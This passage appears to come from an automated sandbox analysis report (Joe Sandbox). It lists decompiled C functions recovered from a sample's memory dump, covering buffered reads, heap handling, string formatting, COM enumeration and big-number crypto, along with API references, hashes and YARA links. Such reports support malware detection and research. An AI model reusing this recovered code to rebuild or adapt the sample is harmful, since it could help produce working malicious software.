					_t81 = E047E58BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d047e90
							E047E7767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E047E61DA(_t100);
						_t98 = _a16;
					}
					E047E61DA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E047E7AB0(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x47ea3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x047e4c94
0x047e4c9d
0x047e4ca4
0x047e4ca9
0x047e4d16
0x047e4d1c
0x047e4d21
0x047e4d28
0x047e4d2d
0x047e4d32
0x047e4e9d
0x047e4ea4
0x047e4ea4
0x047e4ea9
0x047e4eab
0x047e4eab
0x047e4eb4
0x047e4eb4
0x047e4d38
0x047e4d44
0x047e4e93
0x047e4e96
0x00000000
0x047e4e96
0x047e4d4a
0x047e4d4f
0x047e4d52
0x047e4d57
0x047e4d5c
0x047e4da5
0x047e4da5
0x047e4db8
0x047e4dc2
0x047e4dc8
0x047e4dcf
0x047e4dd9
0x047e4dd9
0x047e4dd1
0x047e4dd1
0x047e4dd1
0x047e4dd1
0x047e4dfb
0x047e4e03
0x047e4e31
0x047e4e36
0x047e4e3d
0x047e4e42
0x047e4e46
0x047e4e78
0x047e4e48
0x047e4e55
0x047e4e58
0x047e4e68
0x047e4e6b
0x047e4e71
0x047e4e71
0x047e4e05
0x047e4e12
0x047e4e15
0x047e4e27
0x047e4e2a
0x047e4e2a
0x047e4e82
0x047e4e8e
0x047e4e84
0x047e4e87
0x047e4e87
0x047e4e82
0x047e4dfb
0x00000000
0x047e4dc2
0x047e4d6b
0x047e4d6e
0x047e4d75
0x047e4d7b
0x047e4d7e
0x047e4d80
0x047e4d8c
0x047e4d8f
0x047e4d8f
0x047e4d95
0x047e4d9a
0x047e4d9a
0x047e4da0
0x00000000
0x047e4da0
0x047e4cae
0x00000000
0x047e4cd5
0x047e4cd5
0x047e4ce1
0x047e4cf4
0x047e4cfa
0x047e4d02
0x00000000
0x047e4d02

APIs

StrChrA.SHLWAPI(047E6A76,0000005F,00000000,00000000,00000104), ref: 047E4CC7
lstrcpy.KERNEL32(?,?), ref: 047E4CF4

Part of subcall function 047E6536: lstrlen.KERNEL32(?,00000000,05429E00,00000000,047E6F0A,0542A023,43175AC3,?,?,?,?,43175AC3,00000005,047EA00C,4D283A53,?), ref: 047E653D
Part of subcall function 047E6536: mbstowcs.NTDLL ref: 047E6566
Part of subcall function 047E6536: memset.NTDLL ref: 047E6578

Part of subcall function 047E5B0E: lstrlenW.KERNEL32(?,?,?,047E4E5D,3D047E90,80000002,047E6A76,047E57D1,74666F53,4D4C4B48,047E57D1,?,3D047E90,80000002,047E6A76,?), ref: 047E5B33

Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6

lstrcpy.KERNEL32(?,00000000), ref: 047E4D16

Strings

\, xrefs: 047E4CFA
(, xrefs: 047E4D77

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 565af2424e3f25726c3a8f36c115c2519f5e56d2ec07e2086386c15d1d4777a4
Instruction ID: fd590b370950bb0d59b0c7792e3afc4beae65a433a478afb231f653c8a62eca3
Opcode Fuzzy Hash: 565af2424e3f25726c3a8f36c115c2519f5e56d2ec07e2086386c15d1d4777a4
Instruction Fuzzy Hash: 71512972100209FFDF129FA6DD44EFA7BBAEF0C358F008658FA1596260D735E925AB10

Uniqueness

Uniqueness Score: -1.00%

Function 047E454F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E047E454F(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x47ea160() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x47ea174(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E047E33DC(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x47ea160() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E047E61DA(_v16);
							if(_t58 == 0) {
								_t58 = E047E2B18(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E047E16B2( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E047E16B2( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}

0x047e454f
0x047e455e
0x047e4563
0x047e4565
0x047e456a
0x047e456b
0x047e4570
0x047e4571
0x047e457c
0x047e45ad
0x047e45b2
0x047e4675
0x047e4678
0x047e467e
0x047e467e
0x047e45bf
0x047e45c7
0x047e4672
0x00000000
0x047e4672
0x047e45d2
0x047e45d7
0x047e45dc
0x047e4664
0x047e4665
0x047e4665
0x047e466b
0x00000000
0x047e466b
0x047e45e2
0x047e45e4
0x047e45ea
0x047e45eb
0x047e45eb
0x047e45ee
0x047e45f1
0x047e45f7
0x047e45fc
0x047e45fd
0x047e4602
0x047e4605
0x047e4610
0x00000000
0x00000000
0x047e4618
0x047e4620
0x047e4649
0x047e464c
0x047e4653
0x047e465e
0x047e465e
0x00000000
0x047e4653
0x047e462c
0x047e4630
0x00000000
0x00000000
0x047e4632
0x047e4637
0x00000000
0x00000000
0x047e4639
0x047e4639
0x047e463e
0x00000000
0x00000000
0x047e4640
0x047e4641
0x047e4644
0x047e4644
0x047e45eb
0x047e4584
0x047e458c
0x047e45a5
0x047e45a7
0x00000000
0x00000000
0x00000000
0x047e45a7
0x047e4598
0x047e459c
0x00000000
0x00000000
0x047e45a2
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 047E4565
GetLastError.KERNEL32 ref: 047E457E

Part of subcall function 047E16B2: WaitForMultipleObjects.KERNEL32(00000002,047E7C47,00000000,047E7C47,?,?,?,047E7C47,0000EA60), ref: 047E16CD

ResetEvent.KERNEL32(?), ref: 047E45F7
GetLastError.KERNEL32 ref: 047E4612

Strings

@MetNet, xrefs: 047E457E, 047E4612

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID: @MetNet
API String ID: 2394032930-2109406137
Opcode ID: 34a50d33cd8611ec81591d12fa47fee36d969accc8c9a1333489be9525cb7179
Instruction ID: 8616bd8cef918f67b0d3fad546bfbb0c1b8b8d6ca419953b640002041dc80994
Opcode Fuzzy Hash: 34a50d33cd8611ec81591d12fa47fee36d969accc8c9a1333489be9525cb7179
Instruction Fuzzy Hash: 06319032A00604EBDB219FA7D848EBE77B9FF8C254F154768E551A7290EB30F9459B10

Uniqueness

Uniqueness Score: -1.00%

Function 047E607C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E047E607C() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x47ea3cc; // 0x5429600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x47ea3cc; // 0x5429600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x47ea3cc; // 0x5429600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x47eb142) {
					HeapFree( *0x47ea2d8, 0, _t10);
					_t7 =  *0x47ea3cc; // 0x5429600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x047e607c
0x047e6085
0x047e6095
0x047e6095
0x047e609a
0x047e609f
0x00000000
0x00000000
0x047e608f
0x047e608f
0x047e60a1
0x047e60a6
0x047e60aa
0x047e60bd
0x047e60c3
0x047e60c3
0x047e60cc
0x047e60ce
0x047e60d2
0x047e60d8

APIs

RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E6085
Sleep.KERNEL32(0000000A), ref: 047E608F
HeapFree.KERNEL32(00000000), ref: 047E60BD
RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E60D2

Strings

Uet, xrefs: 047E60BD

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uet
API String ID: 58946197-2766386878
Opcode ID: 55f6060345c3e72e06d667e0611adf5cf488f01b38df5fa112f1e8e68cf9735b
Instruction ID: fff05d61309ea090e5b6e272e47fd6c31129501f0f00445911088dd6d0c19f4d
Opcode Fuzzy Hash: 55f6060345c3e72e06d667e0611adf5cf488f01b38df5fa112f1e8e68cf9735b
Instruction Fuzzy Hash: 32F0D4B52002029BE728CF57D849EA57BB5EB9C711B48CB18EA02DF391D638BC44DA25

Uniqueness

Uniqueness Score: -1.00%

Function 047E35D2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E047E35D2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x47ea348; // 0xc3d5a8
				_t2 = _t22 + 0x47eb7bb; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x47ea2ec >= 5) {
					_t30 = E047E3CE0(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x47ea2ec =  *0x47ea2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E047E56B9(_t50, _t49);
					_t34 = E047E77A5(_t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x47ea2ec < 5) {
							 *0x47ea2ec =  *0x47ea2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E047E63F6();
					HeapFree( *0x47ea2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x47ea3e0; // 0x5429c08
				if(RtlAllocateHeap( *0x47ea2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E047E2B91(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}

0x047e35d9
0x047e35e0
0x047e35e4
0x047e35e9
0x047e35f4
0x047e3604
0x047e3653
0x047e3658
0x047e3658
0x047e365b
0x047e365f
0x047e3699
0x047e3699
0x047e369f
0x047e36a6
0x047e36a6
0x047e3661
0x047e3664
0x047e3666
0x047e3673
0x047e3675
0x047e367c
0x047e36b3
0x047e36b8
0x047e36ba
0x047e36bc
0x047e36bc
0x00000000
0x047e36ba
0x047e367e
0x047e3685
0x047e3693
0x00000000
0x047e3693
0x047e3606
0x047e3621
0x047e363b
0x00000000
0x047e363b
0x047e3634
0x00000000

APIs

wsprintfA.USER32 ref: 047E35F4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047E3619

Part of subcall function 047E2B91: GetTickCount.KERNEL32 ref: 047E2BA8
Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2BF5
Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C12
Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C34
Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C5B
Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2C7C
Part of subcall function 047E2B91: wsprintfA.USER32 ref: 047E2CA7
Part of subcall function 047E2B91: HeapFree.KERNEL32(00000000,?), ref: 047E2CBA

HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 047E3693

Strings

Uet, xrefs: 047E3693

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: wsprintf$Heap$Free$AllocateCountTick
String ID: Uet
API String ID: 1307794992-2766386878
Opcode ID: f6669da5961682b85cc138715e7646d2bf108688333cdebc4d1b5a8ea8e8300e
Instruction ID: eedd24bb13928021037134a6b8721f9a296daaa896148a79b888c2cd0c2b45e9
Opcode Fuzzy Hash: f6669da5961682b85cc138715e7646d2bf108688333cdebc4d1b5a8ea8e8300e
Instruction Fuzzy Hash: 3F314D72600108EBDB01DFA6D984AEA3BBCFB4C345F108622E901EB341D734A944DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 047E6CDF Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E047E6CDF(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x47ea348; // 0xc3d5a8
					_t5 = _t103 + 0x47eb038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x47e9284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x47ea348; // 0xc3d5a8
												_t28 = _t109 + 0x47eb0e4; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x47ea348; // 0xc3d5a8
														_t33 = _t79 + 0x47eb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x047e6ce4
0x047e6ced
0x047e6cee
0x047e6cf2
0x047e6cf8
0x047e6cfe
0x047e6d07
0x047e6d0d
0x047e6d17
0x047e6d19
0x047e6d1f
0x047e6d24
0x047e6d2f
0x047e6d35
0x047e6d3a
0x047e6e5c
0x047e6d40
0x047e6d40
0x047e6d4d
0x047e6d53
0x047e6d59
0x047e6d5d
0x047e6d63
0x047e6d70
0x047e6d74
0x047e6d7a
0x047e6d7d
0x047e6d85
0x047e6d86
0x047e6d8a
0x047e6d8e
0x047e6d91
0x047e6d94
0x047e6d9a
0x047e6da3
0x047e6da9
0x047e6daa
0x047e6dad
0x047e6dae
0x047e6daf
0x047e6db7
0x047e6db8
0x047e6db9
0x047e6dbb
0x047e6dbf
0x047e6dc3
0x00000000
0x00000000
0x047e6dc9
0x047e6dd2
0x047e6dd8
0x047e6de2
0x047e6de6
0x047e6de8
0x047e6df5
0x047e6df9
0x047e6e01
0x047e6e06
0x047e6e18
0x047e6e1a
0x047e6e20
0x047e6e20
0x047e6e29
0x047e6e29
0x047e6e2b
0x047e6e31
0x047e6e31
0x047e6e34
0x047e6e3a
0x047e6e3d
0x047e6e46
0x00000000
0x00000000
0x00000000
0x047e6e46
0x047e6d9a
0x047e6d94
0x047e6d7d
0x047e6e4c
0x047e6e4c
0x047e6e52
0x047e6e52
0x047e6e58
0x047e6e58
0x047e6e61
0x047e6e67
0x047e6e67
0x047e6d24
0x047e6e70

APIs

SysAllocString.OLEAUT32(047E9284), ref: 047E6D2F
lstrcmpW.KERNEL32(00000000,0076006F), ref: 047E6E10
SysFreeString.OLEAUT32(00000000), ref: 047E6E29
SysFreeString.OLEAUT32(?), ref: 047E6E58

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 3cdd936822c7c48635eb1bb4557e557e005c4d6d101b97dabdcc4ab672bf19dc
Instruction ID: 38d9964df5459dcf5b565f1c2a152e02f714745bcdafa21a1c482f37a6bb8c94
Opcode Fuzzy Hash: 3cdd936822c7c48635eb1bb4557e557e005c4d6d101b97dabdcc4ab672bf19dc
Instruction Fuzzy Hash: 92512B75D00519EFCB01DFA9C8889AEB7BAFF8C704B148698E915EB350D731AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 047E597D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 047E59B8
SysFreeString.OLEAUT32(00000000), ref: 047E5A9D

Part of subcall function 047E6CDF: SysAllocString.OLEAUT32(047E9284), ref: 047E6D2F

SafeArrayDestroy.OLEAUT32(00000000), ref: 047E5AF0
SysFreeString.OLEAUT32(00000000), ref: 047E5AFF

Part of subcall function 047E77E3: Sleep.KERNEL32(000001F4), ref: 047E782B

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: a865d52ea5e135ff722db4454274316773df88ac871951a4b28f9d384e58cf66
Instruction ID: 396af864accc062d9ba1e8166234422c27628c5516bfb750b93c1f8faae5a853
Opcode Fuzzy Hash: a865d52ea5e135ff722db4454274316773df88ac871951a4b28f9d384e58cf66
Instruction Fuzzy Hash: 1A514B76500609BFDB11DFA9C888AAEBBB6FF8C704B148A29E505DB310DB35ED45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 047E4781 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E047E4781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E047E61EF(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E047E6725(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E047E7477(_t101,  &_v428, _a8, _t96 - _t81);
					E047E7477(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E047E6725(_t101, 0x47ea1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E047E6725(_a16, _a4);
						E047E7894(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L047E82DA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L047E82D4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E047E5F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E047E6E71(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E047E10A0(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x47ea1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x047e4784
0x047e4790
0x047e4796
0x047e479b
0x047e479f
0x047e4911
0x047e4915
0x047e4915
0x047e47a5
0x047e47a9
0x047e47ad
0x047e47b0
0x047e47bb
0x047e47c1
0x047e47c6
0x047e47c9
0x047e47e3
0x047e47f2
0x047e47fe
0x047e4808
0x047e480d
0x047e480f
0x047e4812
0x047e48c9
0x047e48cf
0x047e48e0
0x047e48f3
0x047e4909
0x00000000
0x047e490e
0x047e481b
0x047e4822
0x047e4826
0x047e482c
0x047e482e
0x047e4830
0x047e4832
0x047e4834
0x047e483e
0x047e4843
0x047e4845
0x047e4847
0x047e4848
0x047e4849
0x047e484a
0x047e4851
0x047e4858
0x047e485b
0x047e485b
0x047e4828
0x047e4828
0x047e4828
0x047e4863
0x047e486b
0x047e4877
0x047e487c
0x047e487c
0x047e4881
0x00000000
0x00000000
0x047e4883
0x047e4886
0x047e4893
0x00000000
0x00000000
0x047e4895
0x047e4895
0x047e48a2
0x047e487c
0x047e4881
0x00000000
0x00000000
0x00000000
0x047e4881
0x047e48ac
0x047e48af
0x047e48b2
0x047e48b9
0x047e48b9
0x047e48c6
0x00000000
0x047e48c6
0x047e47b2
0x047e47b6
0x047e47b7
0x047e47b9
0x00000000
0x00000000
0x00000000
0x047e47b9
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 047E4834
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 047E484A
memset.NTDLL ref: 047E48F3
memset.NTDLL ref: 047E4909

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
